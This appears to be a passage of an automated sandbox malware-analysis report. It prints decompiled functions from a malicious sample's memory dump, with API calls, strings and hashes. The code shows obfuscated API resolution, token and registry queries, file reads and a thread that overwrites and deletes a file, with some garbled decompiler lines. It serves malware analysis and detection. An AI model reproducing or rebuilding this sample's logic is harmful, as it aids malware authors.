Opcode ID: 4d9ba26b82c6916142059aa598c6103ee44a78b2d8567a0c68f2637733f748d2
Instruction ID: 2801a8096cd9e8e6f79e038ecdb2c579e70d8874028a8c49ff257e7c2f12acb3
Opcode Fuzzy Hash: 4d9ba26b82c6916142059aa598c6103ee44a78b2d8567a0c68f2637733f748d2
Instruction Fuzzy Hash: FC2171B6E843493AFA2132B07C63FFA31585B62B5AF050030FD0C64187FAA5AB5955B3

Uniqueness

Uniqueness Score: -1.00%

Function 0009BCD0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E0009BCD0(void* __eflags) {
				void* _t3;
				void* _t4;
				void* _t6;
				intOrPtr* _t8;
				void* _t9;
				intOrPtr* _t10;
				signed int _t11;

				_t3 = E000A9AC0(__eflags, 0xffffffff); // executed
				_t4 = E00097DD0(0xa8);
				_t16 =  ==  ? 0x8026 : 0x801a;
				_t6 = E00099D50(0x647400a4);
				_t8 = E0009BF50(_t3 - _t4, _t6, E00099D50(0x644e562b));
				_t9 =  *_t8(0,  ==  ? 0x8026 : 0x801a, 0, 0, "C:\Users\Albus\AppData\Roaming"); // executed
				if(_t9 == 0) {
					_t10 = E0009BF50(__eflags, 0, 0xfda8b77);
					_t11 =  *_t10(0, "C:\Windows\SysWOW64\msiexec.exe", 0x104);
					__eflags = _t11;
					_t2 = _t11 != 0;
					__eflags = _t2;
					return _t11 & 0xffffff00 | _t2;
				}
				return 0;
			}

0x0009bcd8
0x0009bce7
0x0009bcfb
0x0009bd03
0x0009bd1c
0x0009bd30
0x0009bd34
0x0009bd41
0x0009bd55
0x0009bd57
0x0009bd59
0x0009bd59
0x00000000
0x0009bd59
0x00000000

APIs

SHGetFolderPathW.SHELL32(00000000,0000801A,00000000,00000000,C:\Users\user\AppData\Roaming), ref: 0009BD30

Strings

C:\Users\user\AppData\Roaming, xrefs: 0009BD24
C:\Windows\SysWOW64\msiexec.exe, xrefs: 0009BD4E

Memory Dump Source

Source File: 00000005.00000002.2354321778.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: FolderPath
String ID: C:\Users\user\AppData\Roaming$C:\Windows\SysWOW64\msiexec.exe
API String ID: 1514166925-2433609249
Opcode ID: 1d2181ce6100be1f9ad62c9b501fa46eaf964b88a4ffc4ec71816362a640d2df
Instruction ID: a0fe7930ad87ea9ce1ba0dcedcabb489642e65c530b824d5ec864dc6e48fc1b5
Opcode Fuzzy Hash: 1d2181ce6100be1f9ad62c9b501fa46eaf964b88a4ffc4ec71816362a640d2df
Instruction Fuzzy Hash: 88F06296F8621537FA6121B53C13FBB21488BA2B79F190130FA1D991D3F982A91452B7

Uniqueness

Uniqueness Score: -1.00%

Function 000A8590, Relevance: 4.6, APIs: 3, Instructions: 128
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E000A8590(void* __eflags, intOrPtr _a4) {
				void* _v20;
				long _v24;
				intOrPtr _v28;
				void* _t16;
				intOrPtr* _t18;
				void* _t19;
				union _TOKEN_INFORMATION_CLASS _t22;
				int _t23;
				signed char _t24;
				signed char _t30;
				void* _t31;
				int _t33;
				intOrPtr* _t35;
				signed char* _t36;
				void* _t40;
				intOrPtr* _t41;
				DWORD* _t42;
				signed char* _t43;
				void* _t47;
				intOrPtr _t49;
				void* _t51;
				void* _t54;
				void* _t57;
				void* _t61;
				void* _t63;

				_t63 = __eflags;
				_v20 = 0;
				_t16 = E00099D50(0x647400a5);
				_t18 = E0009BF50(_t63, _t16, E00099D50(0x6b5f7e12));
				_t54 = _t51 + 0x10;
				_t19 =  *_t18(_a4, 8,  &_v20);
				_t64 = _t19;
				if(_t19 == 0) {
					_t49 = 0xffffffff;
					L12:
					return _t49;
				}
				E0009BF50(_t64, 9, 0xbd557e);
				_t22 = E00099D50(0x647400b5);
				_t42 =  &_v24;
				_t23 = GetTokenInformation(_v20, _t22, 0, 0, _t42); // executed
				_t24 = E000955C0(_t23, 0);
				_t57 = _t54 + 0x14;
				_t49 = 0xffffffff;
				_t65 = _t24 & 0x00000001;
				if((_t24 & 0x00000001) == 0) {
					L10:
					E0009BF50(_t71, 0, 0xb8e7db5);
					CloseHandle(_v20); // executed
					goto L12;
				}
				_t30 = E000955C0( *((intOrPtr*)(E0009BF50(_t65, 0, E00099D50(0x68042b4e))))(), 0x7a);
				_t57 = _t57 + 0x14;
				if((_t30 & 0x00000001) == 0) {
					goto L10;
				}
				_t31 = E00098290(_v24);
				_t57 = _t57 + 4;
				_t67 = _t31;
				if(_t31 != 0) {
					_t47 = _t31;
					E0009BF50(_t67, 9, 0xbd557e);
					_t61 = _t57 + 8;
					_t33 = GetTokenInformation(_v20, 0x19, _t47, _v24, _t42); // executed
					_t49 = 0xffffffff;
					_t68 = _t33;
					if(_t33 != 0) {
						_t35 = E0009BF50(_t68, 9, 0x8847844);
						_t61 = _t61 + 8;
						_t36 =  *_t35( *_t47);
						if(_t36 != 0) {
							_t70 =  *_t36;
							_t43 = _t36;
							if( *_t36 != 0) {
								_v28 = E0009BF50(_t70, 9, 0x7a1c189);
								_t40 = E000922E0(_t70, ( *_t43 & 0x000000ff) + 0x57d8073d, 0x57d8073e);
								_t61 = _t61 + 0x10;
								_t41 = _v28( *_t47, _t40);
								_t71 = _t41;
								if(_t41 != 0) {
									_t49 =  *_t41;
								}
							}
						}
					}
					E0009B570(_t47);
					_t57 = _t61 + 4;
				}
			}

0x000a8590
0x000a859c
0x000a85a8
0x000a85c1
0x000a85c6
0x000a85d0
0x000a85d2
0x000a85d4
0x000a86f6
0x000a86fb
0x000a8704
0x000a8704
0x000a85e1
0x000a85f3
0x000a85fb
0x000a8605
0x000a860a
0x000a860f
0x000a8612
0x000a8617
0x000a8619
0x000a86e0
0x000a86e7
0x000a86f2
0x00000000
0x000a86f2
0x000a863c
0x000a8641
0x000a8646
0x00000000
0x00000000
0x000a864f
0x000a8654
0x000a8657
0x000a8659
0x000a865f
0x000a8668
0x000a866d
0x000a867a
0x000a867c
0x000a8681
0x000a8683
0x000a868c
0x000a8691
0x000a8696
0x000a869a
0x000a869c
0x000a869f
0x000a86a1
0x000a86b2
0x000a86c3
0x000a86c8
0x000a86ce
0x000a86d1
0x000a86d3
0x000a86d5
0x000a86d5
0x000a86d3
0x000a86a1
0x000a869a
0x000a86d8
0x000a86dd
0x000a86dd

APIs

GetTokenInformation.KERNELBASE(00000000,00000000,00000000,00000000,?), ref: 000A8605
CloseHandle.KERNEL32(00000000), ref: 000A86F2

Part of subcall function 0009BF50: LoadLibraryA.KERNEL32(?), ref: 0009C1A1

Part of subcall function 00098290: RtlAllocateHeap.NTDLL(00000008,00000000,?,?,?,?,?,?,?,?), ref: 000982E8

GetTokenInformation.KERNELBASE(00000000,00000019,00000000,?,?), ref: 000A867A

Memory Dump Source

Source File: 00000005.00000002.2354321778.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: InformationToken$AllocateCloseHandleHeapLibraryLoad
String ID:
API String ID: 3980138298-0
Opcode ID: be7c8878f23a89422498d23321ab4c7132d28cdc27a174f3599f9b84b0b169a4
Instruction ID: ba9c5bada06ca04430abcedf7208d6edaf5fe3ce74e2084dd3272b17d58d7bd4
Opcode Fuzzy Hash: be7c8878f23a89422498d23321ab4c7132d28cdc27a174f3599f9b84b0b169a4
Instruction Fuzzy Hash: 053182A6E402053BFA1126B46D53BBE35585B52769F090030FD18B52D3FA91AE1497B3

Uniqueness

Uniqueness Score: -1.00%

Function 0009A5E0, Relevance: 4.6, APIs: 3, Instructions: 100
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E0009A5E0(WCHAR* _a4, void** _a8, void* _a12) {
				void* _v12;
				char _v20;
				intOrPtr _v24;
				void* _v28;
				long _v32;
				void* _t21;
				void* _t22;
				intOrPtr* _t24;
				intOrPtr* _t26;
				void* _t28;
				void* _t30;
				int _t32;
				intOrPtr* _t33;
				void** _t42;
				signed int _t43;
				void* _t46;
				void* _t49;
				void* _t51;
				void* _t52;

				_t42 = _a8;
				E0009BF50(_t52, 0, 0xad68947);
				_t46 = (_t43 & 0xfffffff8) - 0x10 + 8;
				_t40 =  ==  ? 1 : 7;
				_t21 = CreateFileW(_a4, 0x80000000,  ==  ? 1 : 7, 0, 3, 0, 0); // executed
				_t54 = _t21 - 0xffffffff;
				_t42[2] = _t21;
				if(_t21 == 0xffffffff) {
					L4:
					_t22 = 0;
				} else {
					_t24 = E0009BF50(_t54, 0, E00099D50(0x651fdb24));
					_t49 = _t46 + 0xc;
					_push( &_v20);
					_push(_t42[2]);
					if( *_t24() == 0) {
						L3:
						_t26 = E0009BF50(_t56, 0, 0xb8e7db5);
						 *_t26(_t42[2]);
						goto L4;
					} else {
						_t56 = _v24;
						if(_v24 == 0) {
							_t28 = _v28;
							__eflags = _t28;
							_t42[1] = _t28;
							if(__eflags == 0) {
								 *_t42 = 0;
								_t22 = 1;
							} else {
								E0009BF50(__eflags, 0, 0x1f8cae3);
								_t49 = _t49 + 8;
								_t30 = VirtualAlloc(0, _t42[1], 0x3000, 4); // executed
								__eflags = _t30;
								 *_t42 = _t30;
								if(__eflags == 0) {
									goto L3;
								} else {
									E0009BF50(__eflags, 0, 0xb7ac9a5);
									_t51 = _t49 + 8;
									_t32 = ReadFile(_t42[2],  *_t42, _t42[1],  &_v32, 0); // executed
									__eflags = _t32;
									if(__eflags == 0) {
										L12:
										_t33 = E0009BF50(__eflags, 0, 0xb1fd105);
										_t49 = _t51 + 8;
										 *_t33( *_t42, 0, 0x8000);
										goto L3;
									} else {
										__eflags = _v32 - _t42[1];
										if(__eflags != 0) {
											goto L12;
										} else {
											_t22 = 1;
										}
									}
								}
							}
						} else {
							goto L3;
						}
					}
				}
				return _t22;
			}

0x0009a5eb
0x0009a5f8
0x0009a5fd
0x0009a60e
0x0009a620
0x0009a622
0x0009a625
0x0009a628
0x0009a66b
0x0009a66b
0x0009a62a
0x0009a63a
0x0009a63f
0x0009a646
0x0009a647
0x0009a64e
0x0009a657
0x0009a65e
0x0009a669
0x00000000
0x0009a650
0x0009a650
0x0009a655
0x0009a674
0x0009a678
0x0009a67a
0x0009a67d
0x0009a6d3
0x0009a6d9
0x0009a67f
0x0009a686
0x0009a68b
0x0009a69a
0x0009a69c
0x0009a69e
0x0009a6a0
0x00000000
0x0009a6a2
0x0009a6a9
0x0009a6ae
0x0009a6c0
0x0009a6c2
0x0009a6c4
0x0009a6dd
0x0009a6e4
0x0009a6e9
0x0009a6f5
0x00000000
0x0009a6c6
0x0009a6ca
0x0009a6cd
0x00000000
0x0009a6cf
0x0009a6cf
0x0009a6cf
0x0009a6cd
0x0009a6c4
0x0009a6a0
0x00000000
0x00000000
0x00000000
0x0009a655
0x0009a64e
0x0009a673

APIs

CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 0009A620
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0009A69A
ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0009A6C0

Memory Dump Source

Source File: 00000005.00000002.2354321778.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: File$AllocCreateReadVirtual
String ID:
API String ID: 3585551309-0
Opcode ID: 8a16c999e614f2cb2d15439e8a71d5afc7428100335bed1b89921a0e8067ef3d
Instruction ID: a72eb89c18b470897a678f10b6653c5c1a7be55482207ed17d97ff94bdca1790
Opcode Fuzzy Hash: 8a16c999e614f2cb2d15439e8a71d5afc7428100335bed1b89921a0e8067ef3d
Instruction Fuzzy Hash: 2431F571744701BBEF216B60DC13F6A76D09B42B11F184828FAAD961D1E7B1F510EAA2

Uniqueness

Uniqueness Score: -1.00%

Function 000A5420, Relevance: 4.6, APIs: 3, Instructions: 72
fileCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E000A5420(WCHAR* _a4) {
				void* _t4;
				signed char _t5;
				long _t7;
				intOrPtr* _t10;
				intOrPtr* _t12;
				void* _t14;
				void* _t17;
				WCHAR* _t18;
				void* _t19;
				void* _t20;
				void* _t22;
				void* _t23;

				_t18 = _a4;
				_t17 = 0;
				while(1) {
					E0009BF50(0, 0, 0xad68947);
					_t4 = CreateFileW(_t18, 0x40000000, 7, 0, 2, 0x4000000, 0); // executed
					_t19 = _t4;
					_t5 = E00094A90(_t4, 0);
					_t22 = _t20 + 0x10;
					_t28 = _t5 & 0x00000001;
					if((_t5 & 0x00000001) == 0) {
						E0009BF50(_t28, 0, 0xb8e7db5);
						_t22 = _t22 + 8;
						CloseHandle(_t19); // executed
					}
					E0009BF50(_t28, 0, 0xbf8ba27);
					_t23 = _t22 + 8;
					_t7 = GetFileAttributesW(_t18); // executed
					_t29 = _t7 - 0xffffffff;
					if(_t7 == 0xffffffff) {
						break;
					}
					_t10 = E0009BF50(_t29, 0, 0xad64007);
					 *_t10(_t18);
					_t12 = E0009BF50(_t29, 0, 0x7a2bc0);
					 *_t12(0xbb8);
					_t17 = _t17 + 1;
					_t14 = E00099D50(0x647400a6);
					_t20 = _t23 + 0x14;
					if(_t17 != _t14) {
						continue;
					}
					break;
				}
				E0009B570(_t18);
				return 0;
			}

0x000a5426
0x000a5429
0x000a5430
0x000a5437
0x000a5452
0x000a5454
0x000a5459
0x000a545e
0x000a5461
0x000a5463
0x000a546c
0x000a5471
0x000a5475
0x000a5475
0x000a547e
0x000a5483
0x000a5487
0x000a5489
0x000a548c
0x00000000
0x00000000
0x000a5495
0x000a549e
0x000a54a7
0x000a54b4
0x000a54b6
0x000a54bc
0x000a54c1
0x000a54c6
0x00000000
0x00000000
0x00000000
0x000a54c6
0x000a54cd
0x000a54db

APIs

CreateFileW.KERNEL32(?,40000000,00000007,00000000,00000002,04000000,00000000), ref: 000A5452
CloseHandle.KERNEL32(00000000), ref: 000A5475
GetFileAttributesW.KERNEL32(?), ref: 000A5487

Memory Dump Source

Source File: 00000005.00000002.2354321778.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: File$AttributesCloseCreateHandle
String ID:
API String ID: 4216088276-0
Opcode ID: fde2cf5772e31156128805affba83f59b84452cbd6b3a1262e2b678172fd21ee
Instruction ID: 59e9257859e20cd102f1783b0292012910d8ac744406bdd59104b605c7079ea9
Opcode Fuzzy Hash: fde2cf5772e31156128805affba83f59b84452cbd6b3a1262e2b678172fd21ee
Instruction Fuzzy Hash: 67014CA6A8420436E96032B43D53FBE31584BA6F2FF150130FA5CA91C3FAC57A1524B7

Uniqueness

Uniqueness Score: -1.00%

Function 0009ABF0, Relevance: 4.6, APIs: 3, Instructions: 59
registryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E0009ABF0(void* _a4, short* _a8, short* _a12, int* _a16, char* _a20, int _a24) {
				void* _t11;
				signed char _t12;
				long _t14;
				signed int _t29;
				void* _t38;

				_t12 = E000A5000(_t11, _t38, 0xffffffff);
				E0009BF50(_t38, 9, 0xda29a27);
				_t14 = RegOpenKeyExW(_a4, _a8, 0, (_t12 & 0x000000ff) << 0x00000008 | 0x00000001,  &_a4); // executed
				_t29 = 0xffffffff;
				_t39 = _t14;
				if(_t14 == 0) {
					E0009BF50(_t39, 9, 0x8097c7);
					RegQueryValueExW(_a4, _a12, 0, _a16, _a20,  &_a24); // executed
					asm("sbb esi, esi");
					_t29 =  !0x00000000 | _a24;
					E0009BF50( !0x00000000, 9, 0x3111c69);
					RegCloseKey(_a4); // executed
				}
				return _t29;
			}

0x0009abfe
0x0009ac16
0x0009ac27
0x0009ac29
0x0009ac2e
0x0009ac30
0x0009ac42
0x0009ac56
0x0009ac5d
0x0009ac61
0x0009ac6b
0x0009ac76
0x0009ac76
0x0009ac7e

APIs

RegOpenKeyExW.KERNEL32(00000000,?,00000000,?,?), ref: 0009AC27
RegQueryValueExW.KERNEL32(?,?,00000000,?,?,?,?,?), ref: 0009AC56

Part of subcall function 0009BF50: LoadLibraryA.KERNEL32(?), ref: 0009C1A1

RegCloseKey.KERNEL32(?,?,?,?,?), ref: 0009AC76

Memory Dump Source

Source File: 00000005.00000002.2354321778.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: CloseLibraryLoadOpenQueryValue
String ID:
API String ID: 3751545530-0
Opcode ID: 0e8ffc89672215796fecbd1346c7872432632bc6830220a73860a93601033418
Instruction ID: 711e3e43aad391e08f1cf9e3f977c3c6a261da2600694e1e7e3509716ed60c4c
Opcode Fuzzy Hash: 0e8ffc89672215796fecbd1346c7872432632bc6830220a73860a93601033418
Instruction Fuzzy Hash: 6D0144779402287BDF109E959C42FEA3758DB45B75F050224FE28A72C2E6A1BD1187F1

Uniqueness

Uniqueness Score: -1.00%

Function 000A4680, Relevance: 3.7, APIs: 2, Instructions: 710
threadCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E000A4680(void* __eflags, intOrPtr _a4, char _a8) {
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v52;
				char _v64;
				intOrPtr _v72;
				char _v76;
				char _v88;
				char _v100;
				char _v112;
				char _v124;
				char _v136;
				char _v148;
				char _v160;
				char _v172;
				char _v184;
				char _v196;
				char _v208;
				char _v220;
				char _v232;
				char _v248;
				char _v266;
				char _v306;
				char _v528;
				char _v1048;
				void* _t171;
				void* _t173;
				void* _t175;
				intOrPtr* _t177;
				void* _t178;
				intOrPtr _t179;
				signed int _t229;
				signed int _t233;
				void* _t236;
				void* _t238;
				void* _t244;
				void* _t252;
				signed int _t254;
				void* _t263;
				void* _t269;
				void* _t276;
				intOrPtr _t279;
				signed int _t287;
				void* _t288;
				void* _t290;
				void* _t293;
				signed char _t299;
				void* _t314;
				signed int _t319;
				void* _t321;
				signed int _t323;
				signed int _t325;
				WCHAR* _t327;
				signed int _t329;
				void* _t339;
				signed int _t341;
				void* _t342;
				void* _t343;
				signed int _t350;
				signed int _t353;
				intOrPtr _t368;
				intOrPtr _t404;
				signed int _t487;
				intOrPtr _t488;
				signed int _t489;
				intOrPtr _t490;
				signed int _t499;
				intOrPtr _t512;
				signed int _t513;
				void* _t530;
				void* _t531;
				void* _t535;
				void* _t593;
				void* _t604;
				void* _t606;
				void* _t609;

				_t171 = E000A7EE0(__eflags, 0xa20123ac, 1, 0xffffffff); // executed
				_t531 = _t530 + 0xc;
				_t611 = _t171;
				if(_t171 == 0) {
					L2:
					_t350 = 0;
				} else {
					_t173 = E000A9AC0(_t611, 0xffffffff); // executed
					_t473 =  ==  ? 0x8026 : 0x801a;
					_t175 = E00099D50(0x647400a4);
					_t177 = E0009BF50(_t173 - 4, _t175, E00099D50(0x644e562b));
					_t535 = _t531 + 0x14;
					_t351 =  &_v1048;
					_t178 =  *_t177(0,  ==  ? 0x8026 : 0x801a, 0, 0,  &_v1048); // executed
					if(_t178 == 0) {
						_t179 = E00098290(0x3d0);
						_t510 = _t179;
						E000A1E90(__eflags, _t179 + 0xc); // executed
						_t2 = _t510 + 0x1c; // 0x1c, executed
						E000A3BC0(_t2, __eflags);
						_t3 = _t510 + 0xe6; // 0xe6
						E00095CD0(__eflags, 2, _t3, 4, 8);
						_t4 = _t510 + 0xf8; // 0xf8
						E0009A980(_t4); // executed
						E000AF740( &_v64);
						__eflags = _a8;
						_t375 =  !=  ? 0xb0bf2 : 0xb051c;
						E000A5180( &_v1048,  &_v64, E00097200( !=  ? 0xb0bf2 : 0xb051c,  &_v528), 0); // executed
						E000AF740( &_v232);
						E000A5180( &_v1048,  &_v232, 0, 0); // executed
						E000AF740( &_v220);
						E000A5180( &_v1048,  &_v220, 0, 0); // executed
						E000AF740( &_v208);
						E000A5180( &_v1048,  &_v208, 0, 0); // executed
						E000AF740( &_v196);
						E000A5180(_t351,  &_v196, 0, 0); // executed
						E000AF740( &_v184);
						E000A5180(_t351,  &_v184, 0, 1); // executed
						E000AF740( &_v172);
						E000A5180(_t351,  &_v172, 0, 1); // executed
						E000AF740( &_v160);
						E000A5180(_t351,  &_v160, 0, 0); // executed
						E000AF740( &_v148);
						E000A5180(_t351,  &_v148, 0, 0); // executed
						E000AF740( &_v136);
						E000A5180(_t351,  &_v136, 0, 0); // executed
						E000AF740( &_v124);
						E000A5180(_t351,  &_v124, 0, 0); // executed
						E000AF740( &_v112);
						E000A5180(_t351,  &_v112, 0, 0); // executed
						E000AF740( &_v100);
						E000A5180(_t351,  &_v100, 0, 0); // executed
						_t487 =  &_v88;
						E000AF740(_t487);
						_t470 = _t487;
						E000A5180(_t351, _t487, 0, 0); // executed
						E000921E0(2, 0x80000001, E00097200(0xb09d0,  &_v306),  &_v266, 4, 8); // executed
						_t404 = _t179;
						_t23 = _t404 + 0x3be; // 0x3be
						_t488 = _t404;
						_v24 = _t404;
						E0009D4F0(_t487, 0, _t23, 4, 8);
						_t25 = _t488 + 0x3c7; // 0x3c7
						E0009D4F0(_t487, 0, _t25, 4, 8);
						_t489 = E000922E0(__eflags, E0009BA30(__eflags, _t351), 0xffffffff);
						_t229 = E0009EC30(E000AFCF0( &_v64) + _t489 * 2, 0xffffffff, _t179 + 0x1fe, 0x20);
						_t512 = _v24;
						__eflags = _t229;
						_t353 = 0 | _t229 == 0x00000000;
						_v20 = _t512 + 0x25e;
						_t233 = E0009EC30(E000AFCF0( &_v232) + _t489 * 2, 0xffffffff, _v20, 0x20);
						_t38 = _t353 + 1; // 0x1
						__eflags = _t233;
						_t513 = _t512 + 0x27e;
						_t408 =  !=  ? _t353 : _t38;
						_v20 =  !=  ? _t353 : _t38;
						_t236 = E0009EC30(E000AFCF0( &_v220) + _t489 * 2, 0xffffffff, _t513, 0x20);
						_t490 = _v24;
						__eflags = _t236 - 1;
						asm("sbb esi, esi");
						_v28 = _t490 + 0x29e;
						_t238 = E000AFCF0( &_v208);
						_v32 = _t489;
						__eflags = E0009EC30(_t238 + _t489 * 2, 0xffffffff, _v28, 0x20) - 1;
						asm("sbb esi, [ebp-0x10]");
						_v28 =  ~_t513;
						_v20 = _t490 + 0x2be;
						_t244 = E000AFCF0( &_v196);
						__eflags = E0009EC30(_t244 + _t489 * 2, 0xffffffff, _v20, E00099D50(0x6474008c));
						_t356 = 0 | __eflags == 0x00000000;
						_v20 = E00091460(__eflags, _t513,  ~(__eflags == 0));
						E00091460(__eflags, _v28, _t356);
						_t252 = E000AFCF0( &_v184);
						_t254 = E0009EC30(_t252 + _v32 * 2, 0xffffffff, _v24 + 0x21e, E00099D50(0x6474008c));
						__eflags = _t254;
						_v28 = E00099D50(0x59d06af4);
						_v36 = _v24 + 0x23e;
						_v36 = E0009EC30(E000AFCF0( &_v172) + _v32 * 2, 0xffffffff, _v36, 0x20);
						_v40 = E00099D50(0xe4894f31);
						_t263 = E0009EC30(E000AFCF0( &_v160) + _v32 * 2, 0xffffffff, _v24 + 0x2de, 0x20);
						__eflags = _v36 - 1;
						asm("adc ebx, 0x0");
						__eflags = _t263 - 1;
						asm("adc ebx, 0x0");
						__eflags = E0009EC30(E000AFCF0( &_v148) + _v32 * 2, 0xffffffff, _v24 + 0x2fe, 0x20);
						_t419 = 0 | __eflags == 0x00000000;
						_v20 = (_t254 == 0) - _v28 + _v20 + _v40 - 0x4358e545;
						_t269 = E00091460(__eflags, (_t254 == 0) - _v28 + _v20 + _v40 + 0xddcba449, __eflags == 0);
						E00091460(__eflags, _v20, _t419);
						_v20 = _v24 + 0x31e;
						__eflags = E0009EC30(E000AFCF0( &_v136) + _v32 * 2, 0xffffffff, _v20, 0x20);
						_v20 = E00091460(E0009EC30(E000AFCF0( &_v136) + _v32 * 2, 0xffffffff, _v20, 0x20), _t269 + 0xdedb7672, 0 | E0009EC30(E000AFCF0( &_v136) + _v32 * 2, 0xffffffff, _v20, 0x20) == 0x00000000);
						_t276 = E000AFCF0( &_v124);
						__eflags = E0009EC30(_t276 + _v32 * 2, 0xffffffff, _v24 + 0x33e, E00099D50(0x6474008c));
						_t279 = E00091460(E0009EC30(_t276 + _v32 * 2, 0xffffffff, _v24 + 0x33e, E00099D50(0x6474008c)), _v20, 0 | E0009EC30(_t276 + _v32 * 2, 0xffffffff, _v24 + 0x33e, E00099D50(0x6474008c)) == 0x00000000);
						_v20 = _v24 + 0x35e;
						__eflags = E0009EC30(E000AFCF0( &_v112) + _v32 * 2, 0xffffffff, _v20, 0x20) - 1;
						asm("adc esi, 0x0");
						_v20 = _t279;
						_t287 = E000955C0(E0009EC30(E000AFCF0( &_v100) + _v32 * 2, 0xffffffff, _v24 + 0x37e, 0x10), 0);
						_t288 = E00099D50(0x1eac204e);
						_t290 = E00091460(__eflags, _v20 - _t288 + (_t287 & 0x00000001), E00099D50(0x1eac204e));
						E00091460(__eflags, _v20, _t287 & 0x00000001);
						_t368 = _v24;
						_v20 = _t368 + 0x38e;
						_t293 = E000AFCF0( &_v88);
						__eflags = E0009EC30(_t293 + _v32 * 2, 0xffffffff, _v20, E00099D50(0x647400bc)) - 1;
						asm("adc esi, 0x0");
						__eflags = E0009EC30( &_v266, 0xffffffff, _t368 + 0x39e, 0x20) - 1;
						asm("adc esi, 0x0");
						_t299 = E00096BB0(E0009EC30( &_v266, 0xffffffff, _t368 + 0x39e, 0x20) - 1, _t290, 0);
						_t593 = _t535 + 0x240;
						__eflags = _t299 & 0x00000001;
						if((_t299 & 0x00000001) != 0) {
							L14:
							_t350 = 0;
							__eflags = 0;
						} else {
							_t314 = E00099D50(0x647410ac);
							_t499 = E0009D620(_t314, E00099D50(0x6474ff53));
							_t319 = E000920A0(__eflags, _t499,  !(E00099D50(0x6474ff53)));
							E00099D50(0x6474ff53);
							_t321 = E00099D50(0x647410ac);
							_t323 = E0009D620(_t321, E00099D50(0x6474ff53));
							 *(_t368 + 0x1fa) = _t323 << E00099D50(0x647400bc) | _t319 & _t499;
							_t325 = E0009D030(_t324, __eflags, _t368); // executed
							_t604 = _t593 + 0x38;
							__eflags = _t325;
							if(_t325 == 0) {
								goto L14;
							} else {
								_t529 = _a4;
								E000AEDD0( &_v52);
								_t327 = E000AFCF0(_a4);
								_t329 = E0009A5E0(_t327,  &_v76, E00099D50(0x647400ae)); // executed
								_t606 = _t604 + 0x10;
								__eflags = _t329;
								if(_t329 != 0) {
									_t470 = _v72 + _v76;
									__eflags = _v72 + _v76;
									E000AF410(_v76,  &_v52, _v76, _v72 + _v76); // executed
									E000A9C40(__eflags,  &_v76); // executed
									_t606 = _t606 + 4;
								}
								_t447 =  &_v52;
								__eflags = E000AF190( &_v52);
								if(__eflags != 0) {
									_t339 = E000AF190( &_v52);
									_t341 = E000ACB00(__eflags,  &_v248, E000AEE10( &_v52), _t339); // executed
									_t609 = _t606 + 0xc;
									__eflags = _t341;
									if(__eflags != 0) {
										E0009ECC0(_t341,  &_v248, _t470, __eflags); // executed
									}
									_t342 = E000AF190( &_v52);
									_t343 = E000AEE10( &_v52);
									_t447 =  &_v64;
									E000A9600(E000AFCF0( &_v64), __eflags, _t344, _t343, _t342); // executed
									_t606 = _t609 + 0xc; // executed
								}
								E000A04C0(_t447, _t470, __eflags); // executed
								E000A5040(_t447, _t470, __eflags); // executed
								__eflags = E000A6700(__eflags);
								if(__eflags != 0) {
									E0009BF50(__eflags, 0, 0xa0733d4);
									CreateThread(0, 0, E000A5420, E000A7640(E000AFCF0(_t529), 0xffffffff), 0, 0); // executed
								}
								E000AFB40( &_v52); // executed
								_t350 = 1;
							}
						}
						E000AFB20( &_v88);
						E000AFB20( &_v100);
						E000AFB20( &_v112);
						E000AFB20( &_v124);
						E000AFB20( &_v136);
						E000AFB20( &_v148);
						E000AFB20( &_v160);
						E000AFB20( &_v172);
						E000AFB20( &_v184);
						E000AFB20( &_v196);
						E000AFB20( &_v208);
						E000AFB20( &_v220);
						E000AFB20( &_v232);
						E000AFB20( &_v64);
					} else {
						goto L2;
					}
				}
				return _t350;
			}

0x000a4695
0x000a469a
0x000a469d
0x000a469f
0x000a46f4
0x000a46f4
0x000a46a1
0x000a46a3
0x000a46b7
0x000a46bf
0x000a46d8
0x000a46dd
0x000a46e0
0x000a46ee
0x000a46f2
0x000a4700
0x000a4708
0x000a470e
0x000a4716
0x000a4719
0x000a471e
0x000a472b
0x000a4733
0x000a473a
0x000a4747
0x000a474c
0x000a475a
0x000a4774
0x000a4784
0x000a4791
0x000a47a1
0x000a47ae
0x000a47be
0x000a47cb
0x000a47db
0x000a47e8
0x000a47f8
0x000a4805
0x000a4815
0x000a4822
0x000a4832
0x000a483f
0x000a484f
0x000a485c
0x000a486c
0x000a4879
0x000a4886
0x000a4893
0x000a48a0
0x000a48ad
0x000a48ba
0x000a48c7
0x000a48cf
0x000a48d4
0x000a48db
0x000a48e1
0x000a4910
0x000a4918
0x000a4920
0x000a4926
0x000a4928
0x000a4932
0x000a493a
0x000a4947
0x000a4966
0x000a4976
0x000a497e
0x000a4983
0x000a498b
0x000a4994
0x000a49a7
0x000a49af
0x000a49b2
0x000a49b4
0x000a49ba
0x000a49bd
0x000a49d6
0x000a49de
0x000a49e1
0x000a49ea
0x000a49f2
0x000a49f5
0x000a49fd
0x000a4a10
0x000a4a19
0x000a4a20
0x000a4a29
0x000a4a2c
0x000a4a52
0x000a4a54
0x000a4a65
0x000a4a6c
0x000a4a83
0x000a4aa0
0x000a4aaa
0x000a4abf
0x000a4ace
0x000a4ae9
0x000a4aff
0x000a4b19
0x000a4b32
0x000a4b36
0x000a4b39
0x000a4b3f
0x000a4b60
0x000a4b68
0x000a4b71
0x000a4b78
0x000a4b8c
0x000a4ba3
0x000a4bc3
0x000a4bd5
0x000a4bde
0x000a4c02
0x000a4c0b
0x000a4c21
0x000a4c3c
0x000a4c42
0x000a4c45
0x000a4c67
0x000a4c79
